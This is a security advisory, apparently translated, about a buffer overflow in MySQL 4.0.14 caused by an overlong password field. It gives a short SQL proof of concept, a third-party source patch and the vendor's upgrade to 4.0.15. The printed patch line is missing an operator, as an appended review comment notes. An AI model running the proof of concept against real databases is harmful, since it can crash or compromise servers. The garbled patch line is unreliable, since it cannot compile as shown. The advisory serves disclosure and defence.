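MySQL Overlong Password Field Buffer Overflow Vulnerability (2)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=106323221912927&w=2
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!
Jedi/Sector One (j@pureftpd.org) provided the following test method: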
> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password = '123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 123456781234567812345678123456781234567812345678123456781234567812345678 12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;
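Recommendations:
--------------------------------------------------------------------------------
Temporary workaround:
If you cannot install the patch or upgrade immediately, NSFOCUS recommends taking the following measures to reduce the threat:
* A third-party patch for MySQL 4.0.14 follows: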
--- mysql-4.0.14-old/sql/sql_acl.cc 2003-07-18 16:57:25.000000000 +0200 +++ mysql-4.0.14/sql/sql_acl.cc 2003-09-10 23:21:13.559759576 +0200 -233,7 +233,7 "Found old style password for user '%s'. Ignoring user. (You may want to restart mysqld using --old-protocol)", user.user ? user.user : ""); /* purecov: tested */ } - else if (length % 8) // This holds true for passwords + else if (length % 8 length > 16) // This holds true for passwords { sql_print_error( "Found invalid password for user: '%s%s'; Ignoring user",
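Review bot: The condition on the added `else if` line reads `length % 8 length > 16`, with no operator between the modulo test and the new upper bound, so it cannot compile as shown; it should presumably read `length % 8 || length > 16`. The bare 16 would be clearer as a named constant for the maximum stored password length, and the trailing comment "This holds true for passwords" should be updated, since the branch now also rejects over-long values and not only lengths that are not a multiple of 8.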
Vendor patch:
MySQL AB
--------
The vendor has released an upgrade that fixes this security issue. Download it from the vendor's site and upgrade to MySQL 4.0.15:
http://www.mysql.com/downloads/mysql-4.0.html